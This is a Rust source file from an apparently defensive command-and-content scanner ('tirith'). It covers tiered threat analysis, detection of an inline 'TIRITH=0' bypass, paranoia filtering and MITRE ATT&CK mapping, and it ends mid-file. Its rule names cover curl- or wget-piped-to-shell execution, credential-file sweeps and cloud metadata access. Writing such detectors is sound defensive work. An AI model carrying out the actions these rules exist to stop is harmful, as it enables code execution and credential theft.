tirith_core/
engine.rs

1use std::time::Instant;
2
3use crate::extract::{self, ScanContext};
4use crate::normalize;
5use crate::policy::Policy;
6use crate::tokenize::ShellType;
7use crate::verdict::{Finding, Timings, Verdict};
8
/// Extract the raw path from a URL string before any normalization.
///
/// The path is the text between the first `/` after the `://` authority and
/// the first `?` or `#`. The query/fragment delimiter is located *before*
/// searching for the slash, so a URL without a path whose query or fragment
/// happens to contain a slash (`https://host?next=/x`, `https://host#/route`)
/// yields `None` rather than a slice of the query or fragment.
///
/// Returns `None` when `raw` has no `://` separator or no path component.
fn extract_raw_path_from_url(raw: &str) -> Option<String> {
    let (_, after_scheme) = raw.split_once("://")?;

    // Drop the query and fragment first; only the authority + path remain.
    let end = after_scheme.find(['?', '#']).unwrap_or(after_scheme.len());
    let authority_and_path = &after_scheme[..end];

    // The first slash after the authority starts the path.
    let slash_idx = authority_and_path.find('/')?;
    Some(authority_and_path[slash_idx..].to_string())
}
22
/// Analysis context passed through the pipeline.
///
/// One value describes a single thing to analyze (a command about to run, a
/// paste, or a file) together with the environment `analyze` needs to pick
/// the right rules and policy.
pub struct AnalysisContext {
    /// Text to analyze: the command line, pasted text, or file contents.
    pub input: String,
    /// Shell dialect used when tokenizing `input` and parsing inline bypasses.
    pub shell: ShellType,
    /// Which pipeline variant to run (exec, paste, or file scan).
    pub scan_context: ScanContext,
    /// Raw bytes of the input, when available. Used for byte-level scans in
    /// paste and file-scan contexts; file scans fall back to `input` when None.
    pub raw_bytes: Option<Vec<u8>>,
    /// Whether the session is interactive; selects which bypass policy flag
    /// (`allow_bypass_env` vs `allow_bypass_env_noninteractive`) applies.
    pub interactive: bool,
    /// Working directory used for policy discovery and command rules.
    pub cwd: Option<String>,
    /// File path being scanned (only populated for ScanContext::FileScan).
    pub file_path: Option<std::path::PathBuf>,
    /// Only populated for ScanContext::FileScan. When None, configfile checks use
    /// `file_path`'s parent as implicit repo root.
    pub repo_root: Option<String>,
    /// True when `file_path` was explicitly provided by the user as a config file.
    pub is_config_override: bool,
    /// Clipboard HTML content for rich-text paste analysis.
    /// Only populated when `tirith paste --html <path>` is used.
    pub clipboard_html: Option<String>,
}
42
/// Report whether `word` is a `NAME=VALUE` token that sets `TIRITH` to `0`.
///
/// The variable name must match exactly. Any run of single or double quote
/// characters at either end of the value is trimmed before the comparison, so
/// `TIRITH='0'` and `TIRITH="0"` are both accepted.
fn is_tirith_zero_assignment(word: &str) -> bool {
    word.split_once('=').is_some_and(|(name, raw_val)| {
        let unquoted = raw_val.trim_matches(|c: char| matches!(c, '\'' | '"'));
        name == "TIRITH" && unquoted == "0"
    })
}
54
55/// Check if the input contains an inline `TIRITH=0` bypass prefix.
56/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
57/// and PowerShell env syntax (`$env:TIRITH="0"; cmd`).
58fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
59    use crate::tokenize;
60
61    if matches!(shell, ShellType::Posix | ShellType::Fish) {
62        let segments = tokenize::tokenize(input, shell);
63        if segments.len() != 1 || has_unquoted_ampersand(input, shell) {
64            return false;
65        }
66    }
67
68    let words = split_raw_words(input, shell);
69    if words.is_empty() {
70        return false;
71    }
72
73    // POSIX / Fish: VAR=VALUE prefix or env wrapper
74    // (Fish 3.1+ and all POSIX shells support `TIRITH=0 command`)
75
76    // Case 1: Leading VAR=VALUE assignments before the command
77    let mut idx = 0;
78    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
79        if is_tirith_zero_assignment(&words[idx]) {
80            return true;
81        }
82        idx += 1;
83    }
84
85    // Case 2: First real word is `env` — parse env-style args
86    if idx < words.len() {
87        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
88        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
89        if cmd == "env" {
90            idx += 1;
91            while idx < words.len() {
92                let w = &words[idx];
93                if w == "--" {
94                    idx += 1;
95                    // After --, remaining are VAR=VALUE or command
96                    break;
97                }
98                if tokenize::is_env_assignment(w) {
99                    if is_tirith_zero_assignment(w) {
100                        return true;
101                    }
102                    idx += 1;
103                    continue;
104                }
105                if w.starts_with('-') {
106                    if w.starts_with("--") {
107                        if env_long_flag_takes_value(w) && !w.contains('=') {
108                            idx += 2;
109                        } else {
110                            idx += 1;
111                        }
112                        continue;
113                    }
114                    // Short flags that take a separate value arg
115                    if w == "-u" || w == "-C" || w == "-S" {
116                        idx += 2;
117                        continue;
118                    }
119                    idx += 1;
120                    continue;
121                }
122                // Non-flag, non-assignment = the command, stop
123                break;
124            }
125            // Check remaining words after -- for TIRITH=0
126            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
127                if is_tirith_zero_assignment(&words[idx]) {
128                    return true;
129                }
130                idx += 1;
131            }
132        }
133    }
134
135    // PowerShell: $env:TIRITH="0" or $env:TIRITH = "0" (before first ;)
136    if shell == ShellType::PowerShell {
137        for word in &words {
138            if is_powershell_tirith_bypass(word) {
139                return true;
140            }
141        }
142        // Multi-word: $env:TIRITH = "0" (space around =)
143        if words.len() >= 3 {
144            for window in words.windows(3) {
145                if is_powershell_env_ref(&window[0], "TIRITH")
146                    && window[1] == "="
147                    && strip_surrounding_quotes(&window[2]) == "0"
148                {
149                    return true;
150                }
151            }
152        }
153    }
154
155    // Cmd: "set TIRITH=0 & ..." or 'set "TIRITH=0" & ...'
156    // In cmd.exe, `set TIRITH="0"` stores the literal `"0"` (with quotes) as the
157    // value, so we must NOT strip inner quotes from the value. Only bare `TIRITH=0`
158    // and whole-token-quoted `"TIRITH=0"` are real bypasses.
159    if shell == ShellType::Cmd && words.len() >= 2 {
160        let first = words[0].to_lowercase();
161        if first == "set" {
162            let second = strip_double_quotes_only(&words[1]);
163            if let Some((name, val)) = second.split_once('=') {
164                if name == "TIRITH" && val == "0" {
165                    return true;
166                }
167            }
168        }
169    }
170
171    false
172}
173
/// Report whether an `env` long option takes a value.
///
/// Anything from the first `=` onward is ignored, so both `--unset` and
/// `--unset=NAME` are recognized.
fn env_long_flag_takes_value(flag: &str) -> bool {
    const VALUE_FLAGS: [&str; 3] = ["--unset", "--chdir", "--split-string"];

    let name = match flag.split_once('=') {
        Some((head, _)) => head,
        None => flag,
    };
    VALUE_FLAGS.contains(&name)
}
178
179/// Check if a word is `$env:TIRITH=0` with optional quotes around the value.
180/// The `$env:` prefix is matched case-insensitively (PowerShell convention).
181fn is_powershell_tirith_bypass(word: &str) -> bool {
182    if !word.starts_with('$') || word.len() < "$env:TIRITH=0".len() {
183        return false;
184    }
185    let after_dollar = &word[1..];
186    if !after_dollar
187        .get(..4)
188        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
189    {
190        return false;
191    }
192    let after_env = &after_dollar[4..];
193    if !after_env
194        .get(..7)
195        .is_some_and(|s| s.eq_ignore_ascii_case("TIRITH="))
196    {
197        return false;
198    }
199    let value = &after_env[7..];
200    strip_surrounding_quotes(value) == "0"
201}
202
/// Report whether `word` is the bare PowerShell environment reference
/// `$env:<var_name>` with nothing after the name (no assignment).
///
/// The `env:` prefix and the variable name are compared ASCII
/// case-insensitively.
fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
    const ENV_PREFIX: &str = "env:";

    let Some(body) = word.strip_prefix('$') else {
        return false;
    };
    match body.get(..ENV_PREFIX.len()) {
        Some(head) if head.eq_ignore_ascii_case(ENV_PREFIX) => {
            body[ENV_PREFIX.len()..].eq_ignore_ascii_case(var_name)
        }
        _ => false,
    }
}
217
/// Remove one layer of matching quotes (`"…"` or `'…'`) from around `s`.
///
/// The input is returned unchanged when it is not wrapped in a matching pair,
/// including a lone quote character.
fn strip_surrounding_quotes(s: &str) -> &str {
    ['"', '\'']
        .iter()
        .find_map(|&quote| s.strip_prefix(quote)?.strip_suffix(quote))
        .unwrap_or(s)
}
228
/// Remove one layer of surrounding double quotes from `s`, if present.
///
/// Single quotes are left alone because cmd.exe treats them as literal
/// characters. Input that is not wrapped in a `"…"` pair is returned as-is.
fn strip_double_quotes_only(s: &str) -> &str {
    s.strip_prefix('"')
        .and_then(|rest| rest.strip_suffix('"'))
        .unwrap_or(s)
}
237
238/// Split input into raw words respecting quotes (for bypass/self-invocation parsing).
239/// Unlike tokenize(), this doesn't split on pipes/semicolons — just whitespace-splits
240/// the raw input to inspect the first segment's words.
241///
242/// Shell-aware: POSIX uses backslash as escape inside double-quotes and bare context;
243/// PowerShell uses backtick (`` ` ``) instead.
244fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
245    let escape_char = match shell {
246        ShellType::PowerShell => '`',
247        ShellType::Cmd => '^',
248        _ => '\\',
249    };
250
251    // Take only up to the first unquoted pipe/semicolon/&&/||
252    let mut words = Vec::new();
253    let mut current = String::new();
254    let chars: Vec<char> = input.chars().collect();
255    let len = chars.len();
256    let mut i = 0;
257
258    while i < len {
259        let ch = chars[i];
260        match ch {
261            ' ' | '\t' if !current.is_empty() => {
262                words.push(current.clone());
263                current.clear();
264                i += 1;
265                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
266                    i += 1;
267                }
268            }
269            ' ' | '\t' => {
270                i += 1;
271            }
272            '|' | '\n' | '&' => break, // Stop at segment boundary
273            ';' if shell != ShellType::Cmd => break,
274            '#' if shell == ShellType::PowerShell => break,
275            '\'' if shell != ShellType::Cmd => {
276                current.push(ch);
277                i += 1;
278                while i < len && chars[i] != '\'' {
279                    current.push(chars[i]);
280                    i += 1;
281                }
282                if i < len {
283                    current.push(chars[i]);
284                    i += 1;
285                }
286            }
287            '"' => {
288                current.push(ch);
289                i += 1;
290                while i < len && chars[i] != '"' {
291                    if chars[i] == escape_char && i + 1 < len {
292                        current.push(chars[i]);
293                        current.push(chars[i + 1]);
294                        i += 2;
295                    } else {
296                        current.push(chars[i]);
297                        i += 1;
298                    }
299                }
300                if i < len {
301                    current.push(chars[i]);
302                    i += 1;
303                }
304            }
305            c if c == escape_char && i + 1 < len => {
306                current.push(chars[i]);
307                current.push(chars[i + 1]);
308                i += 2;
309            }
310            _ => {
311                current.push(ch);
312                i += 1;
313            }
314        }
315    }
316    if !current.is_empty() {
317        words.push(current);
318    }
319    words
320}
321
322/// Check if input contains an unquoted `&` (backgrounding operator).
323fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
324    let escape_char = match shell {
325        ShellType::PowerShell => '`',
326        ShellType::Cmd => '^',
327        _ => '\\',
328    };
329    let chars: Vec<char> = input.chars().collect();
330    let len = chars.len();
331    let mut i = 0;
332    while i < len {
333        match chars[i] {
334            '\'' if shell != ShellType::Cmd => {
335                i += 1;
336                while i < len && chars[i] != '\'' {
337                    i += 1;
338                }
339                if i < len {
340                    i += 1;
341                }
342            }
343            '"' => {
344                i += 1;
345                while i < len && chars[i] != '"' {
346                    if chars[i] == escape_char && i + 1 < len {
347                        i += 2;
348                    } else {
349                        i += 1;
350                    }
351                }
352                if i < len {
353                    i += 1;
354                }
355            }
356            c if c == escape_char && i + 1 < len => {
357                i += 2; // skip escaped char
358            }
359            '&' => return true,
360            _ => i += 1,
361        }
362    }
363    false
364}
365
366/// Run the tiered analysis pipeline.
367pub fn analyze(ctx: &AnalysisContext) -> Verdict {
368    let start = Instant::now();
369
370    // Tier 0: Check bypass flag
371    let tier0_start = Instant::now();
372    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
373    let bypass_inline = find_inline_bypass(&ctx.input, ctx.shell);
374    let bypass_requested = bypass_env || bypass_inline;
375    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;
376
377    // Tier 1: Fast scan (no I/O)
378    let tier1_start = Instant::now();
379
380    // Step 1 (paste only): byte-level scan for control chars
381    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
382        if let Some(ref bytes) = ctx.raw_bytes {
383            let scan = extract::scan_bytes(bytes);
384            scan.has_ansi_escapes
385                || scan.has_control_chars
386                || scan.has_bidi_controls
387                || scan.has_zero_width
388                || scan.has_invalid_utf8
389                || scan.has_unicode_tags
390                || scan.has_variation_selectors
391                || scan.has_invisible_math_operators
392                || scan.has_invisible_whitespace
393        } else {
394            false
395        }
396    } else {
397        false
398    };
399
400    // Step 2: URL-like regex scan
401    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);
402
403    // Step 3 (exec only): check for bidi/zero-width/invisible chars even without URLs
404    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
405        let scan = extract::scan_bytes(ctx.input.as_bytes());
406        scan.has_bidi_controls
407            || scan.has_zero_width
408            || scan.has_unicode_tags
409            || scan.has_variation_selectors
410            || scan.has_invisible_math_operators
411            || scan.has_invisible_whitespace
412    } else {
413        false
414    };
415
416    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;
417
418    // If nothing triggered, fast exit
419    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
420        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
421        return Verdict::allow_fast(
422            1,
423            Timings {
424                tier0_ms,
425                tier1_ms,
426                tier2_ms: None,
427                tier3_ms: None,
428                total_ms,
429            },
430        );
431    }
432
433    // Tier 2: Policy + data loading (deferred I/O)
434    let tier2_start = Instant::now();
435
436    if bypass_requested {
437        // Load partial policy to check bypass settings
438        let policy = Policy::discover_partial(ctx.cwd.as_deref());
439        let allow_bypass = if ctx.interactive {
440            policy.allow_bypass_env
441        } else {
442            policy.allow_bypass_env_noninteractive
443        };
444
445        if allow_bypass {
446            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
447            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
448            let mut verdict = Verdict::allow_fast(
449                2,
450                Timings {
451                    tier0_ms,
452                    tier1_ms,
453                    tier2_ms: Some(tier2_ms),
454                    tier3_ms: None,
455                    total_ms,
456                },
457            );
458            verdict.bypass_requested = true;
459            verdict.bypass_honored = true;
460            verdict.interactive_detected = ctx.interactive;
461            verdict.policy_path_used = policy.path.clone();
462            // Log bypass to audit (include custom DLP patterns from partial policy)
463            crate::audit::log_verdict(
464                &verdict,
465                &ctx.input,
466                None,
467                None,
468                &policy.dlp_custom_patterns,
469            );
470            return verdict;
471        }
472    }
473
474    let mut policy = Policy::discover(ctx.cwd.as_deref());
475    policy.load_user_lists();
476    policy.load_org_lists(ctx.cwd.as_deref());
477    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
478
479    // Tier 3: Full analysis
480    let tier3_start = Instant::now();
481    let mut findings = Vec::new();
482
483    // Track extracted URLs for allowlist/blocklist (Exec/Paste only)
484    let mut extracted = Vec::new();
485
486    if ctx.scan_context == ScanContext::FileScan {
487        // FileScan: byte scan + configfile rules ONLY.
488        // Does NOT run command/env/URL-extraction rules.
489        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
490            bytes.as_slice()
491        } else {
492            ctx.input.as_bytes()
493        };
494        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
495        findings.extend(byte_findings);
496
497        // Config file detection rules
498        findings.extend(crate::rules::configfile::check(
499            &ctx.input,
500            ctx.file_path.as_deref(),
501            ctx.repo_root.as_deref().map(std::path::Path::new),
502            ctx.is_config_override,
503        ));
504
505        // Rendered content rules (file-type gated)
506        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
507            // PDF files get their own parser
508            let is_pdf = ctx
509                .file_path
510                .as_deref()
511                .and_then(|p| p.extension())
512                .and_then(|e| e.to_str())
513                .map(|e| e.eq_ignore_ascii_case("pdf"))
514                .unwrap_or(false);
515
516            if is_pdf {
517                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
518                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
519            } else {
520                findings.extend(crate::rules::rendered::check(
521                    &ctx.input,
522                    ctx.file_path.as_deref(),
523                ));
524            }
525        }
526    } else {
527        // Exec/Paste: standard pipeline
528
529        // Run byte-level rules for paste context
530        if ctx.scan_context == ScanContext::Paste {
531            if let Some(ref bytes) = ctx.raw_bytes {
532                let byte_findings = crate::rules::terminal::check_bytes(bytes);
533                findings.extend(byte_findings);
534            }
535            // Check for hidden multiline content in pasted text
536            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
537            findings.extend(multiline_findings);
538
539            // Check clipboard HTML for hidden content (rich-text paste analysis)
540            if let Some(ref html) = ctx.clipboard_html {
541                let clipboard_findings =
542                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
543                findings.extend(clipboard_findings);
544            }
545        }
546
547        // Invisible character checks apply to both exec and paste contexts
548        if ctx.scan_context == ScanContext::Exec {
549            let byte_input = ctx.input.as_bytes();
550            let scan = extract::scan_bytes(byte_input);
551            if scan.has_bidi_controls
552                || scan.has_zero_width
553                || scan.has_unicode_tags
554                || scan.has_variation_selectors
555                || scan.has_invisible_math_operators
556                || scan.has_invisible_whitespace
557            {
558                let byte_findings = crate::rules::terminal::check_bytes(byte_input);
559                // Only keep invisible-char findings for exec context
560                findings.extend(byte_findings.into_iter().filter(|f| {
561                    matches!(
562                        f.rule_id,
563                        crate::verdict::RuleId::BidiControls
564                            | crate::verdict::RuleId::ZeroWidthChars
565                            | crate::verdict::RuleId::UnicodeTags
566                            | crate::verdict::RuleId::InvisibleMathOperator
567                            | crate::verdict::RuleId::VariationSelector
568                            | crate::verdict::RuleId::InvisibleWhitespace
569                    )
570                }));
571            }
572        }
573
574        // Extract and analyze URLs
575        extracted = extract::extract_urls(&ctx.input, ctx.shell);
576
577        for url_info in &extracted {
578            // Normalize path if available — use raw extracted URL's path for non-ASCII detection
579            // since url::Url percent-encodes non-ASCII during parsing
580            let raw_path = extract_raw_path_from_url(&url_info.raw);
581            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);
582
583            // Run all rule categories
584            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
585            findings.extend(hostname_findings);
586
587            let path_findings = crate::rules::path::check(
588                &url_info.parsed,
589                normalized_path.as_ref(),
590                raw_path.as_deref(),
591            );
592            findings.extend(path_findings);
593
594            let transport_findings =
595                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
596            findings.extend(transport_findings);
597
598            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
599            findings.extend(ecosystem_findings);
600        }
601
602        // Run command-shape rules on full input
603        let command_findings = crate::rules::command::check(
604            &ctx.input,
605            ctx.shell,
606            ctx.cwd.as_deref(),
607            ctx.scan_context,
608        );
609        findings.extend(command_findings);
610
611        // Run credential leak detection rules
612        let cred_findings =
613            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
614        findings.extend(cred_findings);
615
616        // Run environment rules
617        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
618        findings.extend(env_findings);
619
620        // Policy-driven network deny/allow (Team feature)
621        if crate::license::current_tier() >= crate::license::Tier::Team
622            && !policy.network_deny.is_empty()
623        {
624            let net_findings = crate::rules::command::check_network_policy(
625                &ctx.input,
626                ctx.shell,
627                &policy.network_deny,
628                &policy.network_allow,
629            );
630            findings.extend(net_findings);
631        }
632    }
633
634    // Custom YAML detection rules (Team-only, Phase 24)
635    if crate::license::current_tier() >= crate::license::Tier::Team
636        && !policy.custom_rules.is_empty()
637    {
638        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
639        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
640        findings.extend(custom_findings);
641    }
642
643    // Apply policy severity overrides
644    for finding in &mut findings {
645        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
646            finding.severity = override_sev;
647        }
648    }
649
650    // Filter by allowlist/blocklist
651    // Blocklist: if any extracted URL matches blocklist, escalate to Block
652    for url_info in &extracted {
653        if policy.is_blocklisted(&url_info.raw) {
654            findings.push(Finding {
655                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
656                severity: crate::verdict::Severity::Critical,
657                title: "URL matches blocklist".to_string(),
658                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
659                evidence: vec![crate::verdict::Evidence::Url {
660                    raw: url_info.raw.clone(),
661                }],
662                human_view: None,
663                agent_view: None,
664                mitre_id: None,
665                custom_rule_id: None,
666            });
667        }
668    }
669
670    // Allowlist: remove findings for URLs that match allowlist
671    // (blocklist takes precedence — if blocklisted, findings remain)
672    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
673        let blocklisted_urls: Vec<&str> = extracted
674            .iter()
675            .filter(|u| policy.is_blocklisted(&u.raw))
676            .map(|u| u.raw.as_str())
677            .collect();
678
679        findings.retain(|f| {
680            let urls_in_evidence: Vec<&str> = f
681                .evidence
682                .iter()
683                .filter_map(|e| match e {
684                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
685                    _ => None,
686                })
687                .collect();
688
689            if urls_in_evidence.is_empty() {
690                return true;
691            }
692
693            let rule_allowlisted = |url: &str| {
694                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
695                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
696                        policy.is_allowlisted_for_rule(custom_rule_id, url)
697                    })
698            };
699
700            // Keep if any referenced URL is blocklisted. Otherwise only drop the
701            // finding when every referenced URL is allowlisted for this finding.
702            urls_in_evidence
703                .iter()
704                .any(|url| blocklisted_urls.contains(url))
705                || !urls_in_evidence
706                    .iter()
707                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
708        });
709    }
710
711    // Enrichment pass (ADR-13): detection is free, enrichment is paid.
712    // All detection rules have already run above. Now add tier-gated enrichment.
713    let tier = crate::license::current_tier();
714    if tier >= crate::license::Tier::Pro {
715        enrich_pro(&mut findings);
716    }
717    if tier >= crate::license::Tier::Team {
718        enrich_team(&mut findings);
719    }
720
721    // Early access filter (ADR-14): suppress non-critical findings for rules
722    // in time-boxed early access windows when tier is below the minimum.
723    crate::rule_metadata::filter_early_access(&mut findings, tier);
724
725    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
726    let total_ms = start.elapsed().as_secs_f64() * 1000.0;
727
728    let mut verdict = Verdict::from_findings(
729        findings,
730        3,
731        Timings {
732            tier0_ms,
733            tier1_ms,
734            tier2_ms: Some(tier2_ms),
735            tier3_ms: Some(tier3_ms),
736            total_ms,
737        },
738    );
739    verdict.bypass_requested = bypass_requested;
740    verdict.interactive_detected = ctx.interactive;
741    verdict.policy_path_used = policy.path.clone();
742    verdict.urls_extracted_count = Some(extracted.len());
743
744    verdict
745}
746
747// ---------------------------------------------------------------------------
748// Paranoia tier filtering (Phase 15)
749// ---------------------------------------------------------------------------
750
751/// Filter a verdict's findings by paranoia level and license tier.
752///
753/// This is an output-layer filter — the engine always detects everything (ADR-13).
754/// CLI/MCP call this after `analyze()` to reduce noise at lower paranoia levels.
755///
756/// - Paranoia 1-2 (any tier): Medium+ findings only
757/// - Paranoia 3 (Pro required): also show Low findings
758/// - Paranoia 4 (Pro required): also show Info findings
759///
760/// Free-tier users are capped at effective paranoia 2 regardless of policy setting.
761pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
762    retain_by_paranoia(&mut verdict.findings, paranoia);
763    verdict.action = recalculate_action(&verdict.findings);
764}
765
/// Filter a Vec<Finding> by paranoia level and license tier.
/// Same retention logic as `filter_findings_by_paranoia` but operates on raw findings
/// (for scan results that don't use the Verdict wrapper). No action is
/// recalculated here; the caller only gets the reduced list.
pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
    retain_by_paranoia(findings, paranoia);
}
772
773/// Recalculate verdict action from the current findings (same logic as `Verdict::from_findings`).
774fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
775    use crate::verdict::{Action, Severity};
776    if findings.is_empty() {
777        return Action::Allow;
778    }
779    let max_severity = findings
780        .iter()
781        .map(|f| f.severity)
782        .max()
783        .unwrap_or(Severity::Low);
784    match max_severity {
785        Severity::Critical | Severity::High => Action::Block,
786        Severity::Medium | Severity::Low => Action::Warn,
787        Severity::Info => Action::Allow,
788    }
789}
790
791/// Shared paranoia retention logic.
792fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
793    let tier = crate::license::current_tier();
794    let effective = if tier >= crate::license::Tier::Pro {
795        paranoia.min(4)
796    } else {
797        paranoia.min(2) // Free users capped at 2
798    };
799
800    findings.retain(|f| match f.severity {
801        crate::verdict::Severity::Info => effective >= 4,
802        crate::verdict::Severity::Low => effective >= 3,
803        _ => true, // Medium/High/Critical always shown
804    });
805}
806
807// ---------------------------------------------------------------------------
808// Tier-gated enrichment (ADR-13: detect free, enrich paid)
809// ---------------------------------------------------------------------------
810
811/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
812fn enrich_pro(findings: &mut [Finding]) {
813    for finding in findings.iter_mut() {
814        match finding.rule_id {
815            // Rendered content findings: show what human sees vs what agent processes
816            crate::verdict::RuleId::HiddenCssContent => {
817                finding.human_view =
818                    Some("Content hidden via CSS — invisible in rendered view".into());
819                finding.agent_view = Some(format!(
820                    "AI agent sees full text including CSS-hidden content. {}",
821                    evidence_summary(&finding.evidence)
822                ));
823            }
824            crate::verdict::RuleId::HiddenColorContent => {
825                finding.human_view =
826                    Some("Text blends with background — invisible to human eye".into());
827                finding.agent_view = Some(format!(
828                    "AI agent reads text regardless of color contrast. {}",
829                    evidence_summary(&finding.evidence)
830                ));
831            }
832            crate::verdict::RuleId::HiddenHtmlAttribute => {
833                finding.human_view =
834                    Some("Elements marked hidden/aria-hidden — not displayed".into());
835                finding.agent_view = Some(format!(
836                    "AI agent processes hidden element content. {}",
837                    evidence_summary(&finding.evidence)
838                ));
839            }
840            crate::verdict::RuleId::HtmlComment => {
841                finding.human_view = Some("HTML comments not rendered in browser".into());
842                finding.agent_view = Some(format!(
843                    "AI agent reads comment content as context. {}",
844                    evidence_summary(&finding.evidence)
845                ));
846            }
847            crate::verdict::RuleId::MarkdownComment => {
848                finding.human_view = Some("Markdown comments not rendered in preview".into());
849                finding.agent_view = Some(format!(
850                    "AI agent processes markdown comment content. {}",
851                    evidence_summary(&finding.evidence)
852                ));
853            }
854            crate::verdict::RuleId::PdfHiddenText => {
855                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
856                finding.agent_view = Some(format!(
857                    "AI agent extracts all text including sub-pixel content. {}",
858                    evidence_summary(&finding.evidence)
859                ));
860            }
861            crate::verdict::RuleId::ClipboardHidden => {
862                finding.human_view =
863                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
864                finding.agent_view = Some(format!(
865                    "AI agent processes full clipboard including hidden HTML. {}",
866                    evidence_summary(&finding.evidence)
867                ));
868            }
869            _ => {}
870        }
871    }
872}
873
874/// Summarize evidence entries for enrichment text.
875fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
876    let details: Vec<&str> = evidence
877        .iter()
878        .filter_map(|e| {
879            if let crate::verdict::Evidence::Text { detail } = e {
880                Some(detail.as_str())
881            } else {
882                None
883            }
884        })
885        .take(3)
886        .collect();
887    if details.is_empty() {
888        String::new()
889    } else {
890        format!("Details: {}", details.join("; "))
891    }
892}
893
894/// MITRE ATT&CK technique mapping for built-in rules.
895fn mitre_id_for_rule(rule_id: crate::verdict::RuleId) -> Option<&'static str> {
896    use crate::verdict::RuleId;
897    match rule_id {
898        // Execution
899        RuleId::PipeToInterpreter
900        | RuleId::CurlPipeShell
901        | RuleId::WgetPipeShell
902        | RuleId::HttpiePipeShell
903        | RuleId::XhPipeShell => Some("T1059.004"), // Command and Scripting Interpreter: Unix Shell
904
905        // Persistence
906        RuleId::DotfileOverwrite => Some("T1546.004"), // Event Triggered Execution: Unix Shell Config
907
908        // Defense Evasion
909        RuleId::BidiControls
910        | RuleId::UnicodeTags
911        | RuleId::ZeroWidthChars
912        | RuleId::InvisibleMathOperator
913        | RuleId::VariationSelector
914        | RuleId::InvisibleWhitespace => {
915            Some("T1036.005") // Masquerading: Match Legitimate Name or Location
916        }
917        RuleId::HiddenMultiline | RuleId::AnsiEscapes | RuleId::ControlChars => Some("T1036.005"),
918
919        // Hijack Execution Flow
920        RuleId::CodeInjectionEnv => Some("T1574.006"), // Hijack Execution Flow: Dynamic Linker Hijacking
921        RuleId::InterpreterHijackEnv => Some("T1574.007"), // Path Interception by PATH
922        RuleId::ShellInjectionEnv => Some("T1546.004"), // Shell Config Modification
923
924        // Credential Access
925        RuleId::CredentialInText | RuleId::HighEntropySecret => Some("T1552"), // Unsecured Credentials
926        RuleId::PrivateKeyExposed => Some("T1552.004"),                        // Private Keys
927        RuleId::MetadataEndpoint => Some("T1552.005"), // Unsecured Credentials: Cloud Instance Metadata
928        RuleId::SensitiveEnvExport | RuleId::CredentialFileSweep => Some("T1552.001"), // Credentials In Files
929        RuleId::ProcMemAccess => Some("T1003.007"), // OS Credential Dumping: Proc Filesystem
930        RuleId::DockerRemotePrivEsc => Some("T1611"), // Escape to Host
931
932        // Supply Chain
933        RuleId::ConfigInjection => Some("T1195.001"), // Supply Chain Compromise: Dev Tools
934        RuleId::McpInsecureServer | RuleId::McpSuspiciousArgs => Some("T1195.002"), // Compromise Software Supply Chain
935        RuleId::GitTyposquat => Some("T1195.001"),
936        RuleId::DockerUntrustedRegistry => Some("T1195.002"),
937
938        // Discovery / Lateral Movement
939        RuleId::PrivateNetworkAccess => Some("T1046"), // Network Service Discovery
940        RuleId::ServerCloaking => Some("T1036"),       // Masquerading
941
942        // Collection
943        RuleId::ArchiveExtract => Some("T1560.001"), // Archive Collected Data: Archive via Utility
944
945        // Exfiltration
946        RuleId::ProxyEnvSet => Some("T1090.001"), // Proxy: Internal Proxy
947
948        _ => None,
949    }
950}
951
952/// Team enrichment: MITRE ATT&CK classification.
